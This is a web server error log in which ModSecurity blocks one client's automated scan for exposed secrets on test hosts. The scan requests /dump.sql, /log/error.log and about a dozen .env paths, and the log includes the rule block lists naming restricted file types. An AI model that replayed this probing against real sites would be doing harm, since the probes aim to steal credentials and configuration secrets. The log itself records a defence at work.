[Mon Jan 12 15:42:59.073809 2026] [:error] [pid 1355926] [client 18.183.223.70:38190] [client 18.183.223.70] ModSecurity: Warning. String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .rdb/ .resources/ .resx/ .sql/ .swp/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/share/modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "997"] [id "920440"] [msg "URL file extension is restricted by policy"] [data ".sql"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/dump.sql"] [unique_id "aWUIc8C2y5bYy1r2HoPzdgAAAAM"]
[Mon Jan 12 15:42:59.074141 2026] [:error] [pid 1355926] [client 18.183.223.70:38190] [client 18.183.223.70] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/dump.sql"] [unique_id "aWUIc8C2y5bYy1r2HoPzdgAAAAM"]
[Mon Jan 12 15:42:59.074290 2026] [:error] [pid 1355926] [client 18.183.223.70:38190] [client 18.183.223.70] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/dump.sql"] [unique_id "aWUIc8C2y5bYy1r2HoPzdgAAAAM"]
[Mon Jan 12 15:43:00.511699 2026] [:error] [pid 1365300] [client 18.183.223.70:38486] [client 18.183.223.70] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /api/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/api/.env"] [unique_id "aWUIdNlKlmIJBGbQbR78ggAAAAs"]
[Mon Jan 12 15:43:00.511920 2026] [:error] [pid 1365300] [client 18.183.223.70:38486] [client 18.183.223.70] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/api/.env"] [unique_id "aWUIdNlKlmIJBGbQbR78ggAAAAs"]
[Mon Jan 12 15:43:00.512667 2026] [:error] [pid 1365300] [client 18.183.223.70:38486] [client 18.183.223.70] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/api/.env"] [unique_id "aWUIdNlKlmIJBGbQbR78ggAAAAs"]
[Mon Jan 12 15:43:01.245997 2026] [:error] [pid 1362231] [client 18.183.223.70:38632] [client 18.183.223.70] ModSecurity: Warning. String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .rdb/ .resources/ .resx/ .sql/ .swp/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/share/modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "997"] [id "920440"] [msg "URL file extension is restricted by policy"] [data ".log"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/log/error.log"] [unique_id "aWUIdcuCkgRo958sQERiQwAAAAc"]
[Mon Jan 12 15:43:01.246308 2026] [:error] [pid 1362231] [client 18.183.223.70:38632] [client 18.183.223.70] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/log/error.log"] [unique_id "aWUIdcuCkgRo958sQERiQwAAAAc"]
[Mon Jan 12 15:43:01.246491 2026] [:error] [pid 1362231] [client 18.183.223.70:38632] [client 18.183.223.70] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/log/error.log"] [unique_id "aWUIdcuCkgRo958sQERiQwAAAAc"]
[Mon Jan 12 15:43:01.971224 2026] [:error] [pid 1355923] [client 18.183.223.70:38796] [client 18.183.223.70] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /backend/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/backend/.env"] [unique_id "aWUIdSE1xEBhFyXickXrsAAAAAA"]
[Mon Jan 12 15:43:01.971427 2026] [:error] [pid 1355923] [client 18.183.223.70:38796] [client 18.183.223.70] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/backend/.env"] [unique_id "aWUIdSE1xEBhFyXickXrsAAAAAA"]
[Mon Jan 12 15:43:01.971587 2026] [:error] [pid 1355923] [client 18.183.223.70:38796] [client 18.183.223.70] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/backend/.env"] [unique_id "aWUIdSE1xEBhFyXickXrsAAAAAA"]
[Mon Jan 12 15:43:04.876230 2026] [:error] [pid 1355925] [client 18.183.223.70:39416] [client 18.183.223.70] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.local"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env.local"] [unique_id "aWUIeE7thAymmecRvtl0zQAAAAI"]
[Mon Jan 12 15:43:04.876449 2026] [:error] [pid 1355925] [client 18.183.223.70:39416] [client 18.183.223.70] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env.local"] [unique_id "aWUIeE7thAymmecRvtl0zQAAAAI"]
[Mon Jan 12 15:43:04.876605 2026] [:error] [pid 1355925] [client 18.183.223.70:39416] [client 18.183.223.70] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env.local"] [unique_id "aWUIeE7thAymmecRvtl0zQAAAAI"]
[Mon Jan 12 15:43:06.322950 2026] [:error] [pid 1355926] [client 18.183.223.70:39732] [client 18.183.223.70] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.production"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env.production"] [unique_id "aWUIesC2y5bYy1r2HoPzdwAAAAM"]
[Mon Jan 12 15:43:06.323152 2026] [:error] [pid 1355926] [client 18.183.223.70:39732] [client 18.183.223.70] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env.production"] [unique_id "aWUIesC2y5bYy1r2HoPzdwAAAAM"]
[Mon Jan 12 15:43:06.323337 2026] [:error] [pid 1355926] [client 18.183.223.70:39732] [client 18.183.223.70] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env.production"] [unique_id "aWUIesC2y5bYy1r2HoPzdwAAAAM"]
[Mon Jan 12 15:43:07.054950 2026] [:error] [pid 1365295] [client 18.183.223.70:39878] [client 18.183.223.70] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /admin/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/admin/.env"] [unique_id "aWUIew7npFhQv7HWuOadzgAAAAo"]
[Mon Jan 12 15:43:07.055176 2026] [:error] [pid 1365295] [client 18.183.223.70:39878] [client 18.183.223.70] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/admin/.env"] [unique_id "aWUIew7npFhQv7HWuOadzgAAAAo"]
[Mon Jan 12 15:43:07.055343 2026] [:error] [pid 1365295] [client 18.183.223.70:39878] [client 18.183.223.70] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/admin/.env"] [unique_id "aWUIew7npFhQv7HWuOadzgAAAAo"]
[Mon Jan 12 15:43:07.782872 2026] [:error] [pid 1365300] [client 18.183.223.70:40014] [client 18.183.223.70] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /core/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/core/.env"] [unique_id "aWUIe9lKlmIJBGbQbR78gwAAAAs"]
[Mon Jan 12 15:43:07.783089 2026] [:error] [pid 1365300] [client 18.183.223.70:40014] [client 18.183.223.70] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/core/.env"] [unique_id "aWUIe9lKlmIJBGbQbR78gwAAAAs"]
[Mon Jan 12 15:43:07.784192 2026] [:error] [pid 1365300] [client 18.183.223.70:40014] [client 18.183.223.70] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/core/.env"] [unique_id "aWUIe9lKlmIJBGbQbR78gwAAAAs"]
[Mon Jan 12 15:43:08.504679 2026] [:error] [pid 1362231] [client 18.183.223.70:40162] [client 18.183.223.70] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /laravel/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/laravel/.env"] [unique_id "aWUIfMuCkgRo958sQERiRAAAAAc"]
[Mon Jan 12 15:43:08.504885 2026] [:error] [pid 1362231] [client 18.183.223.70:40162] [client 18.183.223.70] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/laravel/.env"] [unique_id "aWUIfMuCkgRo958sQERiRAAAAAc"]
[Mon Jan 12 15:43:08.505055 2026] [:error] [pid 1362231] [client 18.183.223.70:40162] [client 18.183.223.70] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/laravel/.env"] [unique_id "aWUIfMuCkgRo958sQERiRAAAAAc"]
[Mon Jan 12 15:43:09.964508 2026] [:error] [pid 1362233] [client 18.183.223.70:40502] [client 18.183.223.70] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /config/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/config/.env"] [unique_id "aWUIfX2DuVtAKraH1YOOBQAAAAk"]
[Mon Jan 12 15:43:09.964715 2026] [:error] [pid 1362233] [client 18.183.223.70:40502] [client 18.183.223.70] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/config/.env"] [unique_id "aWUIfX2DuVtAKraH1YOOBQAAAAk"]
[Mon Jan 12 15:43:09.964882 2026] [:error] [pid 1362233] [client 18.183.223.70:40502] [client 18.183.223.70] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/config/.env"] [unique_id "aWUIfX2DuVtAKraH1YOOBQAAAAk"]
[Mon Jan 12 15:43:10.685918 2026] [authz_core:error] [pid 1356126] [client 18.183.223.70:40690] AH01630: client denied by server configuration: /var/www/magento.test.indacotrentino.com/www/app/.env
[Mon Jan 12 15:43:11.410849 2026] [:error] [pid 1358564] [client 18.183.223.70:40940] [client 18.183.223.70] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /src/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/src/.env"] [unique_id "aWUIfx_UgGRJ4jDk47tQlwAAAAY"]
[Mon Jan 12 15:43:11.411055 2026] [:error] [pid 1358564] [client 18.183.223.70:40940] [client 18.183.223.70] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/src/.env"] [unique_id "aWUIfx_UgGRJ4jDk47tQlwAAAAY"]
[Mon Jan 12 15:43:11.411221 2026] [:error] [pid 1358564] [client 18.183.223.70:40940] [client 18.183.223.70] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/src/.env"] [unique_id "aWUIfx_UgGRJ4jDk47tQlwAAAAY"]
[Mon Jan 12 15:43:12.139155 2026] [:error] [pid 1355925] [client 18.183.223.70:41162] [client 18.183.223.70] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /storage/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/storage/.env"] [unique_id "aWUIgE7thAymmecRvtl0zgAAAAI"]
[Mon Jan 12 15:43:12.139366 2026] [:error] [pid 1355925] [client 18.183.223.70:41162] [client 18.183.223.70] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/storage/.env"] [unique_id "aWUIgE7thAymmecRvtl0zgAAAAI"]
[Mon Jan 12 15:43:12.139536 2026] [:error] [pid 1355925] [client 18.183.223.70:41162] [client 18.183.223.70] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/storage/.env"] [unique_id "aWUIgE7thAymmecRvtl0zgAAAAI"]
[Mon Jan 12 15:43:12.859053 2026] [authz_core:error] [pid 1355924] [client 18.183.223.70:41374] AH01630: client denied by server configuration: /var/www/magento.test.indacotrentino.com/www/vendor/.env
[Mon Jan 12 15:43:13.586652 2026] [:error] [pid 1355926] [client 18.183.223.70:41592] [client 18.183.223.70] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /assets/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/assets/.env"] [unique_id "aWUIgcC2y5bYy1r2HoPzeAAAAAM"]
[Mon Jan 12 15:43:13.586858 2026] [:error] [pid 1355926] [client 18.183.223.70:41592] [client 18.183.223.70] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/assets/.env"] [unique_id "aWUIgcC2y5bYy1r2HoPzeAAAAAM"]
